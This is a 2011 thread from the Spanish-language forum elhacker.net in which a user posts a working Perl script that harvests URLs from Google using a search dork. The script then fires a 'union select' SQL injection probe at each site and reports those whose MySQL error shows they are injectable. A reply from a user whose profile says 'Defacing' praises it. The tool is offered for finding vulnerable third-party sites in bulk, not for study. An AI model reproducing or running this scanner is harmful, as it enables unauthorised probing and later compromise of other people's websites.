elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Perl] Search in google for scan SQLI
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Perl] Search in google for scan SQLI  (Leído 2,416 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
[Perl] Search in google for scan SQLI
« en: 7 Octubre 2011, 15:57 pm »

Un simple scanner de SQLI para usar en google

Código
  1. #!usr/bin/perl
  2. #Search Google for scan SQLI
  3. #(C) Doddy Hackman 2011
  4.  
  5. use LWP::UserAgent;
  6. use HTML::LinkExtor;
  7.  
  8. my $nave = LWP::UserAgent->new;
  9. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  10. $nave->timeout(5);
  11.  
  12. head();
  13.  
  14. print "\n\n[Dork] : ";
  15. chomp(my $dork = <stdin>);
  16. print "\n\n[Pages] : ";
  17. chomp(my $pages = <stdin>);
  18. print "\n\n[Starting the search]\n\n";
  19. my @links = google($dork,$pages);
  20. print "\n[Links Found] : ".int(@links)."\n\n\n";
  21. print "[Starting the scan]\n\n\n";
  22. for my $link(@links) {
  23. if ($link=~/(.*)=/ig) {
  24. my $web = $1;
  25. sql($web."=");
  26. }}
  27. print "\n\n[+] Finish\n";
  28. copyright();
  29. <stdin>;
  30.  
  31. sub google {
  32. my($a,$b) = @_;
  33. for ($pages=10;$pages<=$b;$pages=$pages+10) {
  34. $code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
  35. my @links = get_links($code);
  36. for my $l(@links) {
  37. if ($l =~/webcache.googleusercontent.com/) {
  38. push(@url,$l);
  39. }
  40. }
  41. }
  42.  
  43. for(@url) {
  44. if ($_ =~/cache:(.*?):(.*?)\+/) {
  45. push(@founds,$2);
  46. }
  47. }
  48.  
  49. my @founds = repes(@founds);
  50.  
  51. return @founds;
  52. }
  53.  
  54.  
  55. sub sql {
  56. my ($pass1,$pass2) = ("+","--");
  57. my $page = shift;
  58. $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
  59. if ($code1=~/The used SELECT statements have a different number of columns/ig) {
  60. print "[+] SQLI : $page\a\n";
  61. }}
  62.  
  63. sub get_links {
  64.  
  65. $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
  66. return @links;
  67.  
  68. sub agarrar {
  69. my ($a,%b) = @_;
  70. push(@links,values %b);
  71. }
  72. }
  73.  
  74. sub repes {
  75. foreach $test(@_) {
  76. push @limpio,$test unless $repe{$test}++;
  77. }
  78. return @limpio;
  79. }
  80.  
  81. sub head {
  82. print "\n\n-- == Search Google == --\n\n";
  83. }
  84.  
  85. sub copyright {
  86. print "\n\n(C) Doddy Hackman 2011\n\n";
  87. exit(1);
  88. }
  89.  
  90. sub toma {
  91. return $nave->get($_[0])->content;
  92. }
  93.  
  94. sub tomar {
  95. my ($web,$var) = @_;
  96. return $nave->post($web,[%{$var}])->content;
  97. }
  98.  
  99. #Thanks to explorer (PerlEnEspañol)
  100. # ¿ The End ?


« Última modificación: 8 Octubre 2011, 19:10 pm por Doddy » En línea

BiteAciD

Desconectado Desconectado

Mensajes: 25

Defacing


Ver Perfil
Re: [Perl] Search in google for scan SQLI
« Respuesta #1 en: 4 Noviembre 2011, 17:48 pm »

Nada como los script ... pulento aporte


En línea

Ese-Hache-E!!!
ELE- ELE!!!
SHe, SHe, SHe, - eL, eL, eL!!!
SHELL CONCHETUMADRE!!!
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Perl] SQLi Dos 0.2
Scripting
BigBear 0 1,814 Último mensaje 7 Octubre 2011, 01:12 am
por BigBear
[Perl] SQLi DOS 0.1
Scripting
BigBear 0 1,315 Último mensaje 7 Octubre 2011, 01:13 am
por BigBear
[Perl] Paranoic Scan 0.9
Scripting
BigBear 0 1,474 Último mensaje 7 Octubre 2011, 01:15 am
por BigBear
[Perl] Scan Port By Doddy H
Scripting
BigBear 0 1,793 Último mensaje 7 Octubre 2011, 15:56 pm
por BigBear
[Perl] Paranoic Scan By Doddy H
Scripting
BigBear 0 1,603 Último mensaje 8 Octubre 2011, 16:56 pm
por BigBear
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines